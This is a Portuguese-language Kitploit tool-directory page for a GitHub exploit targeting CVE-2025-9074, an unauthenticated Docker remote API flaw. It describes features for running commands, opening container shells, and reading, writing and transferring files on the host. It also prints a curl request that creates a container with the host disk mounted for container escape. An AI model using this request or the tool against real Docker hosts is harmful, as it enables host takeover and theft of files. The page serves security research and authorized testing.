Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-9074-Docker-Exploit — Uma poderosa ferramenta de exploração da API remota do Docker, para pesquisa de segurança e teste da vulnerabilidade CVE-2025-9074. | Kitploit
Ferramentas/GitHubGitHub/shaoshi17/cve-2025-9074-docker-exploit
Segurança de ContêineresAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoSegurança na NuvemRed TeamingEscape de Contêiner
GitHubshaoshi17/cve-2025-9074-docker-exploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-9074-Docker-Exploit

Uma poderosa ferramenta de exploração da API remota do Docker, para pesquisa de segurança e teste da vulnerabilidade CVE-2025-9074.

Ver Repositório
12há 7 mesesAinda não revisado

CVE-2025-9074 Ferramenta de Execução de Comandos em Contêineres Docker

Uma ferramenta poderosa de exploração da API remota do Docker, para pesquisa e teste de segurança da vulnerabilidade CVE-2025-9074.

Principais vantagens

✅ Gerenciamento totalmente automático do ciclo de vida de contêineres: Cria contêineres temporários automaticamente e os limpa após a conclusão, sem deixar rastros
✅ Manipulação inteligente de caminhos: Detecta e converte automaticamente caminhos do Windows para o formato de montagem do Docker
✅ Fluxo de operação totalmente automatizado: Não é necessário digitar comandos complexos manualmente; interação por menu, operações de arquivo concluídas com um clique
✅ Compatibilidade multiplataforma: Suporte perfeito para sistemas Windows e Linux

Exemplo visual de alguns recursos

image

Funcionalidades

  • Operações de contêiner

    • Ver contêineres em execução
    • Ver todos os contêineres (incluindo os parados)
    • Criar novo contêiner
    • Parar contêiner
    • Remover contêiner
    • Execução de comando único
    • Terminal interativo (requer a biblioteca docker)
  • Gerenciamento de imagens

    • Ver imagens locais
    • Baixar nova imagem
    • Remover imagem
  • Operações de arquivos no host

    • Enviar arquivo para o host
    • Baixar arquivo do host
    • Ler conteúdo de arquivo do host
    • Gravar arquivo no host
    • Tratamento automático do mapeamento de caminhos do Windows Docker Desktop

Descrição da vulnerabilidade

CVE-2025-9074 é uma vulnerabilidade de segurança na API remota do Docker. Um atacante pode, por meio de acesso não autorizado à API do Docker:

  • Executar comandos arbitrários
  • Criar contêineres e montar discos do host
  • Realizar escape de contêiner
  • Ler/gravar arquivos do host

Requisitos de ambiente

  • Python 3.6+

Instalar dependências

Instale todas as dependências com o requirements.txt:

root@kitploit:~
pip install -r requirements.txt

Ou instale manualmente:

root@kitploit:~
pip install requests docker websocket-client

Como usar

Uso básico

Execute o script diretamente usando o endereço padrão da API do Docker:

root@kitploit:~
python CVE-2025-9074-docker-exploit.py

Personalizar o endereço da API do Docker

root@kitploit:~
python CVE-2025-9074-docker-exploit.py -u http://192.168.1.100:2375

Parâmetros de linha de comando

root@kitploit:~
python CVE-2025-9074-docker-exploit.py [选项]

选项:
  -u, --url URL         Docker API 地址(默认: http://192.168.65.7:2375)

Detalhes das funcionalidades

Operações de contêiner

  1. Ver contêineres em execução: Exibe a lista de todos os contêineres em execução
  2. Ver todos os contêineres: Exibe todos os contêineres (incluindo os parados)
  3. Criar novo contêiner: Cria um novo contêiner usando a imagem especificada
  4. Parar contêiner: Para o contêiner em execução
  5. Remover contêiner: Remove o contêiner (pode ser forçado)
  6. Execução de comando único: Executa um único comando no contêiner
  7. Terminal interativo: Entra no shell interativo do contêiner (requer a biblioteca docker)

Usando o terminal interativo

  1. Após executar o script, selecione "1. Operações de contêiner"
  2. Selecione "1. Ver contêineres em execução"
  3. Digite o número do contêiner para selecioná-lo
  4. Selecione "2. Terminal interativo (requer a biblioteca docker)"
  5. Digite o comando shell (padrão: /bin/sh)
  6. Comece a operação interativa

Gerenciamento de imagens

  1. Ver imagens: Lista todas as imagens locais
  2. Baixar imagem: Baixa uma nova imagem do Docker Hub
  3. Remover imagem: Remove a imagem local

Operações de arquivos no host

Enviar arquivo para o host

root@kitploit:~
1. 上传文件到宿主机
请输入本地文件路径: /path/to/local/file.txt
请输入宿主机目标目录: D:/temp
请输入目标文件名 (留空则使用原文件名): 

Baixar arquivo do host

root@kitploit:~
2. 从宿主机下载文件
请输入宿主机文件路径: D:/temp/file.txt
请输入本地保存路径: /tmp

Ler conteúdo de arquivo do host

root@kitploit:~
3. 读取宿主机文件内容
请输入宿主机文件路径: D:/temp/file.txt

Gravar arquivo no host

root@kitploit:~
4. 向宿主机写入文件
请输入宿主机目标目录: D:/temp
请输入文件内容: Hello, World!

Mapeamento de caminhos do Windows Docker Desktop

Esta ferramenta trata automaticamente o mapeamento de caminhos do Windows Docker Desktop:

Caminho do Windows

Formatos de entrada suportados:

  • D:\ ou D:/
  • D:\temp ou D:/temp
  • "D:\file.txt" (com aspas)
  • 'D:/file.txt' (com aspas)

Avisos de segurança

⚠️ Aviso importante:

  1. Somente para testes autorizados: Esta ferramenta é destinada exclusivamente a testes de segurança autorizados e fins educacionais.
  2. Conformidade legal: Antes de usar, certifique-se de obter autorização explícita do sistema de destino.
  3. Ambiente isolado: Recomenda-se usar em um ambiente de teste isolado.
  4. Restrições de permissão: O Windows Docker Desktop precisa ser executado como administrador para gravar no disco C.
  5. Não abuse: O uso não autorizado desta ferramenta pode violar leis e regulamentos.

Princípios técnicos

Escape de contêiner

Cria um contêiner via API do Docker e monta o disco do host:

root@kitploit:~
curl -X POST "http://<target>:2375/containers/create" \
  -H "Content-Type: application/json" \
  -d '{
    "Image": "python:3.11.7",
    "Cmd": ["sleep", "999d"],
    "HostConfig": {
      "Binds": ["/mnt/host/d:/tmp"]
    },
    "Tty": true
  }'

Leitura e gravação de arquivos

Lê e grava arquivos do host executando comandos no contêiner:

root@kitploit:~
# 写入文件
echo "content" > /tmp/file.txt

# 读取文件
cat /tmp/file.txt

Solução de problemas

Falha ao criar contêiner (erro 500)

  • Verifique se a API do Docker está acessível
  • Confirme se o formato do caminho está correto
  • Verifique se a imagem existe

Falha ao gravar arquivo

  • O Windows Docker Desktop precisa ser executado como administrador
  • Verifique as permissões do diretório de destino

Não foi possível iniciar o terminal interativo

  • Certifique-se de que a biblioteca docker está instalada: pip install docker websocket-client
  • Verifique se o terminal suporta o modo interativo

Desenvolvimento e testes

Executar testes

root@kitploit:~
python CVE-2025-9074-docker-exploit.py

Estrutura do código

root@kitploit:~
CVE-2025-9074-docker-exploit.py
├── 容器管理函数
│   ├── get_containers()
│   ├── display_containers()
│   ├── create_container()
│   ├── stop_container()
│   └── delete_container()
├── 镜像管理函数
│   ├── get_images()
│   ├── display_images()
│   ├── pull_image()
│   └── remove_image()
├── 宿主机文件操作函数
│   ├── upload_file_to_host()
│   ├── download_file_from_host()
│   ├── read_file_from_host()
│   └── write_file_to_host()
└── 工具函数
    ├── normalize_host_path()
    ├── create_container_with_mount()
    ├── start_container()
    └── stop_and_remove_container()

Contribuição

Contribuições são bem-vindas! Envie Issues e Pull Requests!

Licença

Este projeto é destinado apenas para fins educacionais e de pesquisa em segurança.

Isenção de responsabilidade

Esta ferramenta é destinada exclusivamente a testes de segurança autorizados e fins educacionais. O usuário assume toda a responsabilidade e os riscos do uso desta ferramenta. O autor não se responsabiliza por qualquer uso indevido ou não autorizado desta ferramenta.

Referências

  • Detalhes da vulnerabilidade CVE-2025-9074
  • Documentação da API remota do Docker
  • Regras de mapeamento de caminhos do Windows Docker Desktop
Baixar ferramenta
Caminho de montagem do Docker
D:\/mnt/host/d
D:\temp/mnt/host/d/temp
C:\Windows/mnt/host/c/Windows
C:\Users\test/mnt/host/c/Users/test